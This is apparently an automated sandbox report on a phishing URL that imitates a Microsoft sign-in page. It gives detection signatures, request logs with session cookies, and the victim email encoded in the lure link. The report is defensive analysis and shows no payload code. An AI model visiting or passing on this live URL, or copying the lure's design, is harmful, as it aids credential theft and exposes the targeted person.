Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t

Overview

General Information

Sample URL:https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t
Analysis ID:1445887
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found

Classification

  • System is w10x64
  • chrome.exe (PID: 2196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,16849530955463525120,13524078821275849099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_110JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs' is highly suspicious as it does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The use of a random subdomain and path is a common technique in phishing attacks. The page contains a login form, which is often targeted in phishing attempts. The overall appearance of the page mimics the legitimate Microsoft login page, indicating the use of social engineering techniques. DOM: 2.5.pages.csv
        Source: Yara matchFile source: 3.6.pages.csv, type: HTML
        Source: Yara matchFile source: 2.5.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_110, type: DROPPED
        Source: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29tHTTP Parser: Base64 decoded: <script>
        Source: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29tHTTP Parser: Base64 decoded: <script>
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsMatcher: Found strong image similarity, brand: MICROSOFT
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsMatcher: Template: microsoft matched
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs#Matcher: Template: microsoft matched
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: Number of links: 0
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29tHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: Title: iHnMCa98cW does not match URL
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: Invalid link: Terms of use
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: Invalid link: Privacy & cookies
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: <input type="password" .../> found
        Source: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29tHTTP Parser: No favicon
        Source: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29tHTTP Parser: No favicon
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalHTTP Parser: No favicon
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalHTTP Parser: No favicon
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalHTTP Parser: No favicon
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: No favicon
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: No <meta name="author".. found
        Source: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /infd201971/ HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oknya83345.eleteriod.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oknya83345.eleteriod.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/695da7821231/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oknya83345.eleteriod.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://oknya83345.eleteriod.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887dff9f6d8f429d HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/infd201971/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ilk0L1dSZVJ5TGJsOVRGTHNiWUxvS2c9PSIsInZhbHVlIjoiRjhRQU1qKzVESlpKZzVxQ3JmdmpPLy9SZGhBWHZwTGNLQ3FxeHI0QVZSOWNkOWEzVHZvZytuQ2tNT0FUUEdxemtETUx2T2hkR2V6YXpMMTRDN2UvTnJELzlubUxFY2RGdGRYYTN5WmJOWDh4UnE3RHpqOGo5N2JTekF0RmpqMjUiLCJtYWMiOiIwNWNlNTQ3ZGY2OWVlZGVmY2JmMThjNzEwMGZmODkxNWViZjFmODExODIyZjMyY2M0ZGJjMDEyYTQ1ZDI5ODI1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik53VTU4TzlpczB4ZUtOcGczZGN3K2c9PSIsInZhbHVlIjoiV0dhQW5WcEtNd2Q1bldEcWRRT3Zacll4RU9uWFpXWVp4R1RUQkVQcTZWWEhNQ2ZzTU9tTXhMM3l3by9FYUJwSGhlc0xmTW5CWTBRMWpNTms4NVlrYWIvM3RUTmcrWW1wd1IyMXZFdlpMc1lrOTBqbjJHVC92S1pmMzdpTWRYdEQiLCJtYWMiOiJmYjlkNzZmYTYxZTdlMTZiNTVhZjAzMmI1OGY1OGM4ODNlMzczZjE0YTZkNzI5YzdjNDkwMjI4ZmYyMTE4YWY4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/887dff9f6d8f429d/1716393414082/c0c2613fc26f1c8d1c5546c7cb6650be050f91d030f34066ed5eb405a0890187/hlziBgVNbWjZocR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /infd201971/ HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://oknya83345.eleteriod.com/infd201971/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im9udjdxQkZ3RXozRnNtQ0pxVjdPa3c9PSIsInZhbHVlIjoiWnFablhDa2k2Uys2ME5VekZXR2k2T0NUdUhnSktPOCtGc0lRcytrRFNpQzFsSDZNd0w0UDFhNng0L3NJQ2dkVVowS2J2RndjTFlaRjI5SE1oSGg5WjYrcmZSMHRaRVMxVTVPOExpbzdpZG9iMWxoYkVIS1Uxd2JqSnl4ZmtDTHMiLCJtYWMiOiJlNzU3YzE0ZmRkOTE4NmZhZTg2OTI3MDlhY2QwY2Q5OGRmOTcxYWRjZWRkZDI2MzE0MTVhYzhmMjc3OTAyYTU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InplcXJVbmlUdFEydysvSVRDdDNyVGc9PSIsInZhbHVlIjoiSml2eVdmU1ovWVN3S1AwdGRmL1dhVm5GcVovMi9EM3BYS3A1bThmNmlRNFlmQTViOTJTdG1QL3ViejlDZ1NDN3ljejVGai90U2czTFl5RStMVGs3OTJCLzAyT3doczJuYmxKcVVlWGxSRGVlQ0tjekFMeENKWVRHbTN6Yi8xRkkiLCJtYWMiOiJlODczNzc0NjBjYzg4NDRjOTNmNDQ5NTQ0NjAzZmVmZGVlMGUyODQ2ZDQxMjg3NDNmZWNhOTliNWJjZDFmYWZhIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /mxCAKSFLZHZgSbiN6uhzP4xbZjf HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im9udjdxQkZ3RXozRnNtQ0pxVjdPa3c9PSIsInZhbHVlIjoiWnFablhDa2k2Uys2ME5VekZXR2k2T0NUdUhnSktPOCtGc0lRcytrRFNpQzFsSDZNd0w0UDFhNng0L3NJQ2dkVVowS2J2RndjTFlaRjI5SE1oSGg5WjYrcmZSMHRaRVMxVTVPOExpbzdpZG9iMWxoYkVIS1Uxd2JqSnl4ZmtDTHMiLCJtYWMiOiJlNzU3YzE0ZmRkOTE4NmZhZTg2OTI3MDlhY2QwY2Q5OGRmOTcxYWRjZWRkZDI2MzE0MTVhYzhmMjc3OTAyYTU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InplcXJVbmlUdFEydysvSVRDdDNyVGc9PSIsInZhbHVlIjoiSml2eVdmU1ovWVN3S1AwdGRmL1dhVm5GcVovMi9EM3BYS3A1bThmNmlRNFlmQTViOTJTdG1QL3ViejlDZ1NDN3ljejVGai90U2czTFl5RStMVGs3OTJCLzAyT3doczJuYmxKcVVlWGxSRGVlQ0tjekFMeENKWVRHbTN6Yi8xRkkiLCJtYWMiOiJlODczNzc0NjBjYzg4NDRjOTNmNDQ5NTQ0NjAzZmVmZGVlMGUyODQ2ZDQxMjg3NDNmZWNhOTliNWJjZDFmYWZhIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /infd201971/?VEaheinmaa@cidel.com HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://oknya83345.eleteriod.com/infd201971/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNMNlIxd0k1WFVLaTlMa1hrbXFGcmc9PSIsInZhbHVlIjoiNVVMRW1rTlFjQzc5MW9kV2VRL3VZK3piM2poTkpVYjlnZWVuMzczNmpOcy9GZjVvZDZMYjFqMWtaeS91c3FyT1lJdWU0ZFgwL080VlNleE1iUkpFYitSa0VDSEZ4Ynd5bko3RWxNMzlrYllTRk5GSld1dVhVelN6TlN4T2p4dTQiLCJtYWMiOiI1YjFiMTE5NGY1ZTE1MGE4Nzc1NWMxMmQ0OTlhYjI0ODU4MjEzOGIzNjc4Mjc2YTQ3ZmIyMzc1YmFiMmU4Mzc5IiwidGFnIjoiIn0%3D; 